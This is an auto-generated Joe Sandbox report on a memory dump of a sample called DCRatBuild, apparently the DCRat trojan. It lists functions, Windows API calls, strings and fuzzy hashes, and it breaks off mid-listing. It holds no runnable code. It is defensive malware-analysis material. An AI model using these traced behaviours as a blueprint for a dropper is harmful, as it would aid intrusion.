Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9
API String ID: 557298264-1548518664
Opcode ID: c90dea25c4547e61d05961f0dace891198dd4fe917742396480745acb91754e5
Instruction ID: 87027cb4fb6bfa7352a0873fea49fc1b981fd6d9dfea65fc48258d34cc1ef3c2
Opcode Fuzzy Hash: c90dea25c4547e61d05961f0dace891198dd4fe917742396480745acb91754e5
Instruction Fuzzy Hash: DD32E371D00258DBCF65EF64C842AEE77B5FF09300F40815AF9499B282E7799D85CB98

Function 0008D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0008B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0008B579
Part of subcall function 0008B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0008B58A
Part of subcall function 0008B568: IsDialogMessageW.USER32(000103F6,?), ref: 0008B59E
Part of subcall function 0008B568: TranslateMessage.USER32(?), ref: 0008B5AC
Part of subcall function 0008B568: DispatchMessageW.USER32(?), ref: 0008B5B6

GetDlgItem.USER32(00000068,000CFCB8), ref: 0008D4E8
ShowWindow.USER32(00000000,00000005,?,?,?,0008AF07,00000001,?,?,0008B7B9,000A506C,000CFCB8,000CFCB8,00001000,00000000,00000000), ref: 0008D510
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0008D51B
SendMessageW.USER32(00000000,000000C2,00000000,000A35F4), ref: 0008D529
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0008D53F
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0008D559
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0008D59D
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0008D5AB
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0008D5BA
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0008D5E1
SendMessageW.USER32(00000000,000000C2,00000000,000A43F4), ref: 0008D5F0

Strings

\, xrefs: 0008D549

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: e2adada59542dff5087098d29e7455771468900c16d691a944d329a00a27ec12
Instruction ID: ef492703341182b4e146d4faea883da6083dbc060876d0c57c8d38306be9fd1b
Opcode Fuzzy Hash: e2adada59542dff5087098d29e7455771468900c16d691a944d329a00a27ec12
Instruction Fuzzy Hash: 8231C471146742BBE311EF209C5AFAB7FACEF82704F00460AF991961A1DB688A04C777

Function 0008D78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 0008D7AE
ShellExecuteExW.SHELL32(?), ref: 0008D8DE
ShowWindow.USER32(?,00000000), ref: 0008D91D
GetExitCodeProcess.KERNEL32(?,?), ref: 0008D959
CloseHandle.KERNEL32(?), ref: 0008D97F
ShowWindow.USER32(?,00000001), ref: 0008D9E1

Strings

.exe, xrefs: 0008D989
.inf, xrefs: 0008D89A

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf
API String ID: 36480843-3750412487
Opcode ID: 7452d45057741bc28068dc0be2937356c8ba4af43f81848d24bcf4296462061b
Instruction ID: 67adfbbb90c72d3ff5265854177a50db50adc455e2d6f5f4adc10040e1bfbba2
Opcode Fuzzy Hash: 7452d45057741bc28068dc0be2937356c8ba4af43f81848d24bcf4296462061b
Instruction Fuzzy Hash: 3E51C370508380AAEB70BF649844BABBBE5BF82744F04061FF9C4971D1EBB48D45DB62

Function 00093B72 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,?,00093C35,00000000,00000FA0,000D2088,00000000,?,00093D60,00000004,InitializeCriticalSectionEx,000A6394,InitializeCriticalSectionEx,00000000), ref: 00093C03

Strings

c*, xrefs: 00093BBE, 00093BC8, 00093BD9
api-ms-, xrefs: 00093BC3

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$c*
API String ID: 3664257935-3017260439
Opcode ID: 8bc3c7a8a659dea3704d0478a87afbde0d613819a8fe7cfa48fef7bb9db9f7fe
Instruction ID: 05e5538eab93bce0f88b883c1bee2909ccb7cbf3cc10e838badb7a42df088d72
Opcode Fuzzy Hash: 8bc3c7a8a659dea3704d0478a87afbde0d613819a8fe7cfa48fef7bb9db9f7fe
Instruction Fuzzy Hash: FB11A332A45A21ABDF329B689C41B9E77A49F02770F250111FA15EB290E775EF00AED1

Function 0009A95B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,000957FB,000957FB,?,?,?,0009ABAC,00000001,00000001,2DE85006), ref: 0009A9B5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0009ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0009AA3B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0009AB35
__freea.LIBCMT ref: 0009AB42

Part of subcall function 00098E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00094286,?,0000015D,?,?,?,?,00095762,000000FF,00000000,?,?), ref: 00098E38

__freea.LIBCMT ref: 0009AB4B
__freea.LIBCMT ref: 0009AB70

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: b54ab4158d6e86b8ba41aa7630402657212d12e23808c24fdb52946e35baaf92
Instruction ID: 3ea8b9766b2ee038fa0a6f3c7e09b9b6a06bde20ddf8449572c6d7c9cec27a58
Opcode Fuzzy Hash: b54ab4158d6e86b8ba41aa7630402657212d12e23808c24fdb52946e35baaf92
Instruction Fuzzy Hash: 8D51BF72700216ABEF258E64CC82EBFB7EAEB46750B154629FC04D6152EB34DC50E6D2

Function 0009AD34 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,@,00000000,00000000,?,0009ACDB,@,00000000,00000000,00000000,?,0009AED8,00000006,FlsSetValue), ref: 0009AD66
GetLastError.KERNEL32(?,0009ACDB,@,00000000,00000000,00000000,?,0009AED8,00000006,FlsSetValue,000A7970,FlsSetValue,00000000,00000364,?,000998B7), ref: 0009AD72
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0009ACDB,@,00000000,00000000,00000000,?,0009AED8,00000006,FlsSetValue,000A7970,FlsSetValue,00000000), ref: 0009AD80

Strings

@, xrefs: 0009AD5D

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: @
API String ID: 3177248105-1838441277
Opcode ID: 46b310e82808666be1341fee03467475154691fa7604f562645335915fcbd32e
Instruction ID: 16ab5ff16daf603773287ed6d15b08b10dee7575d622d9a6353b80549a32c66c
Opcode Fuzzy Hash: 46b310e82808666be1341fee03467475154691fa7604f562645335915fcbd32e
Instruction Fuzzy Hash: C001F736703622ABDF714B689C44E5B7B98EF477A27110620F907D7650D724DD0196E1

Function 0008ABAB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 0008ABC2
SHAutoComplete.SHLWAPI(?,00000010), ref: 0008ABF9

Part of subcall function 00081FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0007C116,00000000,.exe,?,?,00000800,?,?,?,00088E3C), ref: 00081FD1

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0008ABE9

Strings

EDIT, xrefs: 0008ABCD, 0008ABD8, 0008ABE5
@Uw, xrefs: 0008ABF9

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: @Uw$EDIT
API String ID: 4243998846-71825367
Opcode ID: 4957da0dc1a7ea129342b754918eaeab00f75b3b554e3977bbc7ae824b9cd3a0
Instruction ID: 65daf6aed8941b8c4efbb967fb86a2b72146eeeaf9be21c833652624b5e762a7
Opcode Fuzzy Hash: 4957da0dc1a7ea129342b754918eaeab00f75b3b554e3977bbc7ae824b9cd3a0
Instruction Fuzzy Hash: EAF082327012287AEB2066649C09FDB77ACAF47B50F484022BE45B2181DBA4DA4186B6

Function 000798E0 Relevance: 7.6, APIs: 5, Instructions: 111
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00077760,?,00000005,?,00000011), ref: 0007995F
GetLastError.KERNEL32(?,?,00077760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0007996C
CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00077760,?,00000005,?), ref: 000799A2
GetLastError.KERNEL32(?,?,00077760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000799AA
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00077760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000799F9

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 251fa9937119a807c059581c227b00eebc131c9ba0a539b151b796dde975ed78
Instruction ID: 3db25307cc95b1a27d19a652c152c21ac641ffe59ed1080cdc7d80bce6414882
Opcode Fuzzy Hash: 251fa9937119a807c059581c227b00eebc131c9ba0a539b151b796dde975ed78
Instruction Fuzzy Hash: 823124309447456FF7309F28CC46BDABBD4BB05320F104B19FAE9961D1D3B8A944CBA9

Function 0008AC16 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0008081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00080836
Part of subcall function 0008081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0007F2D8,Crypt32.dll,00000000,0007F35C,?,?,0007F33E,?,?,?), ref: 00080858

OleInitialize.OLE32(00000000), ref: 0008AC2F
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0008AC66
SHGetMalloc.SHELL32(000B8438), ref: 0008AC70

Strings

riched20.dll, xrefs: 0008AC1E

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll
API String ID: 3498096277-3360196438
Opcode ID: 1d96179b27ee77e27d1135669aa30f769359b392df8dcdca3330b23f337c1487
Instruction ID: 0c18ce7f20a44bb2a4508fb199122391a67e285bf135d610a56fa953bbcb446e
Opcode Fuzzy Hash: 1d96179b27ee77e27d1135669aa30f769359b392df8dcdca3330b23f337c1487
Instruction Fuzzy Hash: 30F049B5900209ABDB10AFA9D8499EFFFFCEF84700F00402AA941A2201CBB856058FA1

Function 0008DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0008DBF4
SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0008DC30

Strings

sfxcmd, xrefs: 0008DBEF
sfxpar, xrefs: 0008DC2B

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 64e28dab9dcb932dd8d803099f8a32c13ccd6f6bca961bbd3acf1718fa78c4ba
Instruction ID: 4ec6aa442ea99dffacee5f24d08a0f2c8027dd25bc8c3ddfde7d34ceafffc0de
Opcode Fuzzy Hash: 64e28dab9dcb932dd8d803099f8a32c13ccd6f6bca961bbd3acf1718fa78c4ba
Instruction Fuzzy Hash: B5F0ECB2504225ABDB203FD5CC06BFA779CBF05782B040411FDC599192E7B48940D7B0

Function 00079785 Relevance: 6.1, APIs: 4, Instructions: 56
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00079795
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 000797AD
GetLastError.KERNEL32 ref: 000797DF
GetLastError.KERNEL32 ref: 000797FE

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 991bcd42ac1f7336f93000616abc8dac6b9b5269e496b89da6bc38434269b3e6
Instruction ID: 059951ce49c683a887d6d7f6afcaf4978f2e313554fe8cfb637b0a58f632ab3d
Opcode Fuzzy Hash: 991bcd42ac1f7336f93000616abc8dac6b9b5269e496b89da6bc38434269b3e6
Instruction Fuzzy Hash: 94118E30D18608EBDFB49F64C804A6E77E9FB42320F10C929F42E85190DB7C9E44DB6A

Function 0009BA27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 000997E5: GetLastError.KERNEL32(?,000B1098,00094674,000B1098,?,?,000940EF,?,?,000B1098), ref: 000997E9
Part of subcall function 000997E5: _free.LIBCMT ref: 0009981C
Part of subcall function 000997E5: SetLastError.KERNEL32(00000000,?,000B1098), ref: 0009985D
Part of subcall function 000997E5: _abort.LIBCMT ref: 00099863

Part of subcall function 0009BB4E: _abort.LIBCMT ref: 0009BB80
Part of subcall function 0009BB4E: _free.LIBCMT ref: 0009BBB4

Part of subcall function 0009B7BB: GetOEMCP.KERNEL32(00000000,?,?,0009BA44,?), ref: 0009B7E6

_free.LIBCMT ref: 0009BA9F
_free.LIBCMT ref: 0009BAD5

Strings

p, xrefs: 0009BAC9

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID: p
API String ID: 2991157371-3461400186
Opcode ID: 8c01cdd8f13a6c9a11a803838cff4f3365a3aaeeabc325e45e79072d581045b8
Instruction ID: 13b7c8ce33fb699f44eaab560ee76a9afa0a126d6387849d6388792337572fe6
Opcode Fuzzy Hash: 8c01cdd8f13a6c9a11a803838cff4f3365a3aaeeabc325e45e79072d581045b8
Instruction Fuzzy Hash: F831D731904209AFDF10EFA8E641BADB7F5EF41330F254099E9049B2A3EB765D40EB51

Function 0008101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00010000,Function_00011160,?,00000000,00000000), ref: 00081043
SetThreadPriority.KERNEL32(?,00000000), ref: 0008108A

Part of subcall function 00076C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00076C54

Part of subcall function 00076DCB: _wcschr.LIBVCRUNTIME ref: 00076E0A
Part of subcall function 00076DCB: _wcschr.LIBVCRUNTIME ref: 00076E19

Strings

CreateThread failed, xrefs: 0008104F

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2706921342-3849766595
Opcode ID: 3c4c0e61ba0e120de0f2aaa93cc57e785477114402540af24474f31068a75b05
Instruction ID: 41094fced72ab9ce9b672b753d1e974000c3d7a4ca4df00d915f3e1994dbca74
Opcode Fuzzy Hash: 3c4c0e61ba0e120de0f2aaa93cc57e785477114402540af24474f31068a75b05
Instruction Fuzzy Hash: 0901A2B57443096BE3307E68AC65BF6739CFB40751F20452EF68756282CAE568858724

Function 00098268 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 0009BF30: GetEnvironmentStringsW.KERNEL32 ref: 0009BF39
Part of subcall function 0009BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0009BF5C
Part of subcall function 0009BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0009BF82
Part of subcall function 0009BF30: _free.LIBCMT ref: 0009BF95
Part of subcall function 0009BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0009BFA4

_free.LIBCMT ref: 000982AE
_free.LIBCMT ref: 000982B5

Strings

0", xrefs: 0009829B

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
String ID: 0"
API String ID: 400815659-36242975
Opcode ID: 2830a47ceae722005034bcad64f7a04aa256c7f5d4e3350a9256f771ab87d03e
Instruction ID: 183940a244b8fe22fb19fd684c9d824bb34dbd00fb3ef6fa6647cde107a91bd6
Opcode Fuzzy Hash: 2830a47ceae722005034bcad64f7a04aa256c7f5d4e3350a9256f771ab87d03e
Instruction Fuzzy Hash: 4FE0E53360694251AEA1733A7C02AAF17444B93338B54421AF910C63C3CE58880276B2

Function 00079F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,0007D343,00000001,?,?,?,00000000,0008551D,?,?,?), ref: 00079F9E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0008551D,?,?,?,?,?,00084FC7,?), ref: 00079FE5
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0007D343,00000001,?,?), ref: 0007A011

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
